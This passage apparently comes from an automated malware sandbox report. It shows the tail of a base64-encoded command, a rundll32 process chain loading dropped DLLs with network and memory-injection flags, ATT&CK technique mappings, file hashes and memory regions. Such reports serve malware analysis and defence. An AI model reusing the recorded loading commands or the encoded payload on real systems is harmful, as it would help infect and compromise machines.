1AGcAPQAoACgAJwBZACcAKwAnAGQANQBzADkAJwApACsAJwBhAGsAJwApAA==
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1716
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1688
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll #1
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1680
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\ilhy.seq",RunDLL
              5⤵
              • Blocklisted process makes network request
              • Drops file in System32 directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:2004
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\uoxuvhosbdx.dll",RunDLL BAIAABwAAABXAHUAZgBsAFwAaQBsAGgAeQAuAHMAZQBxAAAA
                6⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:1652
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Wufl\ilhy.seq",Control_RunDLL
                  7⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1948

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    System Information Discovery

    1
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5

      de24d773012ce76420e96cadc48a6c92

      SHA1

      cffbf1120fc0f6d702505d5d0ed2160caba98c9c

      SHA256

      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048

      SHA512

      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • C:\Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5

      9a062ead5b2d55af0a5a4b39c5b5eadc

      SHA1

      fc83367be87c700a696b0329dab538b5e47d90bf

      SHA256

      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef

      SHA512

      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861

    • \Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5

      de24d773012ce76420e96cadc48a6c92

      SHA1

      cffbf1120fc0f6d702505d5d0ed2160caba98c9c

      SHA256

      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048

      SHA512

      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • \Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5

      de24d773012ce76420e96cadc48a6c92

      SHA1

      cffbf1120fc0f6d702505d5d0ed2160caba98c9c

      SHA256

      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048

      SHA512

      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • \Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5

      de24d773012ce76420e96cadc48a6c92

      SHA1

      cffbf1120fc0f6d702505d5d0ed2160caba98c9c

      SHA256

      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048

      SHA512

      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • \Users\Admin\Bqpeen6\Bbs5w_e\Yvtlx6p4.dll
      MD5

      de24d773012ce76420e96cadc48a6c92

      SHA1

      cffbf1120fc0f6d702505d5d0ed2160caba98c9c

      SHA256

      6bb1f167bccb5b48b3064af319a7a6aba843c118d8ea85e99910c60583ab6048

      SHA512

      ebbf5faa8ffccc8652ada5360621850bd9ae26e8c006e9395df7b70b149fc423b18070c9c4b5eb6e9d62059ed7a7876333b274f868fe123d538125d5fff9409c

    • \Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5

      9a062ead5b2d55af0a5a4b39c5b5eadc

      SHA1

      fc83367be87c700a696b0329dab538b5e47d90bf

      SHA256

      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef

      SHA512

      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861

    • \Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5

      9a062ead5b2d55af0a5a4b39c5b5eadc

      SHA1

      fc83367be87c700a696b0329dab538b5e47d90bf

      SHA256

      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef

      SHA512

      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861

    • \Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5

      9a062ead5b2d55af0a5a4b39c5b5eadc

      SHA1

      fc83367be87c700a696b0329dab538b5e47d90bf

      SHA256

      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef

      SHA512

      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861

    • \Windows\SysWOW64\Wufl\uoxuvhosbdx.dll
      MD5

      9a062ead5b2d55af0a5a4b39c5b5eadc

      SHA1

      fc83367be87c700a696b0329dab538b5e47d90bf

      SHA256

      a9c68d527223db40014d067cf4fdae5be46cca67387e9cfdff118276085f23ef

      SHA512

      693ab862c7e3c5dad3ca3d44bbc4a5a4c2391ff558e02e86e4c1d7d1fa7c00b4acf1c426ca619dea2b422997caaf1f0ecba37ec0ffca19edaca297005c9ad861

    • memory/768-30-0x000007FEF79D0000-0x000007FEF7C4A000-memory.dmp
      Filesize

      2.5MB

    • memory/1432-6-0x0000000000000000-mapping.dmp
    • memory/1652-31-0x0000000000000000-mapping.dmp
    • memory/1652-38-0x0000000002070000-0x0000000002081000-memory.dmp
      Filesize

      68KB

    • memory/1652-40-0x0000000000190000-0x00000000001B0000-memory.dmp
      Filesize

      128KB

    • memory/1652-39-0x0000000000170000-0x000000000018D000-memory.dmp
      Filesize

      116KB

    • memory/1680-20-0x0000000000000000-mapping.dmp
    • memory/1680-26-0x0000000000220000-0x0000000000242000-memory.dmp
      Filesize

      136KB

    • memory/1680-21-0x0000000076241000-0x0000000076243000-memory.dmp
      Filesize

      8KB

    • memory/1688-18-0x0000000000000000-mapping.dmp
    • memory/1716-13-0x000000001AAE0000-0x000000001AAE2000-memory.dmp
      Filesize

      8KB

    • memory/1716-7-0x0000000000000000-mapping.dmp
    • memory/1716-15-0x00000000023A0000-0x00000000023A1000-memory.dmp
      Filesize

      4KB

    • memory/1716-14-0x000000001AAE4000-0x000000001AAE6000-memory.dmp
      Filesize

      8KB

    • memory/1716-17-0x000000001C100000-0x000000001C101000-memory.dmp
      Filesize

      4KB

    • memory/1716-16-0x000000001C070000-0x000000001C071000-memory.dmp
      Filesize

      4KB

    • memory/1716-8-0x000007FEFBA41000-0x000007FEFBA43000-memory.dmp
      Filesize

      8KB

    • memory/1716-9-0x000007FEF5410000-0x000007FEF5DFC000-memory.dmp
      Filesize

      9.9MB

    • memory/1716-12-0x00000000025D0000-0x00000000025D1000-memory.dmp
      Filesize

      4KB

    • memory/1716-11-0x000000001AB60000-0x000000001AB61000-memory.dmp
      Filesize

      4KB

    • memory/1716-10-0x0000000002360000-0x0000000002361000-memory.dmp
      Filesize

      4KB

    • memory/1812-2-0x0000000072541000-0x0000000072544000-memory.dmp
      Filesize

      12KB

    • memory/1812-5-0x0000000005E90000-0x0000000005E92000-memory.dmp
      Filesize

      8KB

    • memory/1812-4-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1812-3-0x000000006FFC1000-0x000000006FFC3000-memory.dmp
      Filesize

      8KB

    • memory/1948-41-0x0000000000000000-mapping.dmp
    • memory/1948-44-0x0000000000220000-0x0000000000240000-memory.dmp
      Filesize

      128KB

    • memory/2004-29-0x0000000000200000-0x0000000000222000-memory.dmp
      Filesize

      136KB

    • memory/2004-27-0x0000000000000000-mapping.dmp